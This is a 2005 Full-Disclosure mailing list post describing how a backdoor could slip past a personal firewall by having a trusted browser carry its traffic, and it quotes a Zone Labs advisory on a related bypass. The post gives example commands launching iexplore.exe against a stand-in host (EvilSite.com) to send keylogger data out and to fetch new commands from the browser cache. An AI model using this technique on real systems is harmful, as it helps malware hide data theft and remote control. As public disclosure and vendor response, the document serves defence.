Bypassing Personal Firewall, is it that* hard?

[Bipin Gautam <gautam.bipin () gmail com>]

hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
Bypassing Personal Firewall & let an internal (evil) application
communicate with the external world,  the hard. I mean... OK try
this........ Lets.. me give you a simple concept. I'll call it
'passive communication' ( in lack of better world)

say... a backdoor want to communicate to its server... It can do
is,.... use a trusted internal application to do the job. Suppose; it
creates a batch file run the batch file  (evil.bat) & executes this
command

....Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__

the batch file will get executed & Internet explorer will happily send
the DATA. This trick can be used to send OUTPUT as well as get
input... without trigering the firewall.

To get input; the backdoor can do is... say, run similar BAT script:

....Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

well... the history of the page 
www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE
cache... Then the backdoor can do is... RUN a string based 'GREP' in
the IE cache & see if there is any new job to acomplish.

just a rough theory... but ya its POSSIBLE; to let a internal backdoor
have I/O with its server without trigering the firewall alert....

---------------
yap it does work... using the same trick can't the backdoor happily
communicate with its server using the trick

On 9/30/05, Zone Labs Security Team <security () zonelabs com> wrote:
> Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro)
> Using DDE-IPC"
>
> Overview:
>
> Debasis Mohanty published a notice about a potential security issue
> with personal firewalls to several security email lists on
> September 28th, 2005.   Zone Labs has investigated his claims
> and has determined that current versions of Zone Labs and
> Check Point end-point security products are not vulnerable.
>
>
> Description:
>
> The proof-of-concept code published uses the Windows API function
> ShellExecute() to launch a trusted program that is used to access
> the network on behalf of the untrusted program, thereby accessing
> the network without warning from the firewall.
>
>
> Impact:
>
> If successfully exploited, a malicious program may be able to
> access the network via a trusted program.   The ability to
> access the network would be limited to the functionality of the
> trusted program.
>
>
> Unaffected Products:
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
> and ZoneAlarm Security Suite version 6.0 or later automatically
> protect against this attack in the default configuration.
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
> and ZoneAlarm Security Suite version 5.5 are protected against
> this attack by enabling the "Advanced Program Control" feature.
>
> Check Point Integrity client versions 6.0 and 5.5 are protected
> against this attack by enabling the "Advanced Program Control" feature.
>
>
> Affected Products:
>
> ZoneAlarm free versions lack the "Advanced Program Control"
> feature and are therefore unable to prevent this bypass technique.
>
>
> Recommended Actions:
>
> Subscribers should upgrade to the latest version of their
> ZoneAlarm product or enable the "Advanced Program Control" feature.
>
>
> Related Resources:
>
> Zone Labs Security Services http://www.zonelabs.com/security
>
>
> Contact:
>
> Zone Labs customers who are concerned about this vulnerability or
> have additional technical questions may reach our Technical Support
> group at: http://www.zonelabs.com/support/.
>
> To report security issues with Zone Labs products contact
> security () zonelabs com. Note that any other matters sent to this
> email address will not receive a response.
>
>
> Disclaimer:
>
> The information in the advisory is believed to be accurate at the
> time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS
> condition. There are no warranties with regard to this information.
> Neither the author nor the publisher accepts any liability for any
> direct, indirect, or consequential loss or damage arising from use
> of, or reliance on, this information. Zone Labs and Zone Labs
> products, are registered trademarks of Zone Labs LLC. and/or
> affiliated companies in the United States and other countries.
> All other registered and unregistered trademarks represented in
> this document are the sole property of their respective
> companies/owners.
>
> Copyright: (c)2005 Zone Labs LLC All rights reserved. Zone Labs,
> TrueVector, ZoneAlarm, and Cooperative Enforcement are registered
> trademarks of Zone Labs LLC The Zone Labs logo, Check Point
> Integrity and IMsecure are trademarks of Zone Labs, LLC. Check Point
> Integrity protected under U.S. Patent No. 5,987,611. Reg. U.S. Pat.
> & TM Off. Cooperative Enforcement is a service mark of Zone Labs LLC.
> All other trademarks are the property of their respective owners.
> Any reproduction of this alert other than as an unmodified copy of
> this file requires authorization from Zone Labs. Permission to
> electronically redistribute this alert in its unmodified form is
> granted. All other rights, including the use of other media, are
> reserved by Zone Labs LLC.

--

Bipin Gautam

Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/